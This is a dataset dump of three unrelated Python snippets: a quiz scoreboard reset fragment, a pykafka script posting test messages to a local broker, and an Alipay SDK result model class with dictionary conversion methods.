if quizzes_played > 1:
    print("")
    yes_no = yn_checker("Would you like to re-start your score board? ")
    if yes_no == "Yes":
        # Clear both tallies and show the reset board.
        losses = 0
        wins = 0
        print(losses)
        print(wins)
21555868489 | from pykafka import KafkaClient
import time
# Connect to the local broker and publish ten numbered test messages to the
# "geostream" topic, one per second, then report how many were sent.
client = KafkaClient("127.0.0.1:9093")
geostream = client.topics["geostream"]

with geostream.get_sync_producer() as producer:
    sent = 0
    for seq in range(10):
        # pykafka expects bytes; the payload is plain ASCII text.
        producer.produce("Kafka is not just an author {}".format(seq).encode("ascii"))
        sent += 1
        time.sleep(1)

print("Posted {}".format(sent))
17035436664 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AccessPurchaseOrderSendResult(object):
    """Alipay OpenAPI domain model: result of sending an access purchase order.

    All fields are optional; :meth:`to_alipay_dict` / :meth:`from_alipay_dict`
    convert to and from the wire-level dict representation.
    """

    # Field names in wire order; drives the (de)serialization loops below,
    # replacing seven copies of the same if/hasattr branch.
    _FIELD_NAMES = (
        'asset_item_id',
        'asset_order_id',
        'asset_purchase_id',
        'error_code',
        'error_desc',
        'out_biz_no',
        'success',
    )

    def __init__(self):
        self._asset_item_id = None
        self._asset_order_id = None
        self._asset_purchase_id = None
        self._error_code = None
        self._error_desc = None
        self._out_biz_no = None
        self._success = None

    @property
    def asset_item_id(self):
        return self._asset_item_id

    @asset_item_id.setter
    def asset_item_id(self, value):
        self._asset_item_id = value

    @property
    def asset_order_id(self):
        return self._asset_order_id

    @asset_order_id.setter
    def asset_order_id(self, value):
        self._asset_order_id = value

    @property
    def asset_purchase_id(self):
        return self._asset_purchase_id

    @asset_purchase_id.setter
    def asset_purchase_id(self, value):
        self._asset_purchase_id = value

    @property
    def error_code(self):
        return self._error_code

    @error_code.setter
    def error_code(self, value):
        self._error_code = value

    @property
    def error_desc(self):
        return self._error_desc

    @error_desc.setter
    def error_desc(self, value):
        self._error_desc = value

    @property
    def out_biz_no(self):
        return self._out_biz_no

    @out_biz_no.setter
    def out_biz_no(self, value):
        self._out_biz_no = value

    @property
    def success(self):
        return self._success

    @success.setter
    def success(self, value):
        self._success = value

    def to_alipay_dict(self):
        """Return a dict of the truthy fields, recursively serialising values.

        NOTE(review): falsy values (e.g. success=False, empty strings) are
        omitted, matching the convention of the SDK's generated models.
        """
        params = dict()
        for name in self._FIELD_NAMES:
            value = getattr(self, name)
            if not value:
                continue
            if hasattr(value, 'to_alipay_dict'):
                params[name] = value.to_alipay_dict()
            else:
                params[name] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build an instance from a wire dict; returns None for empty input."""
        if not d:
            return None
        o = AccessPurchaseOrderSendResult()
        for name in AccessPurchaseOrderSendResult._FIELD_NAMES:
            if name in d:
                setattr(o, name, d[name])
        return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/AccessPurchaseOrderSendResult.py | AccessPurchaseOrderSendResult.py | py | 4,074 | python | en | code | 241 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.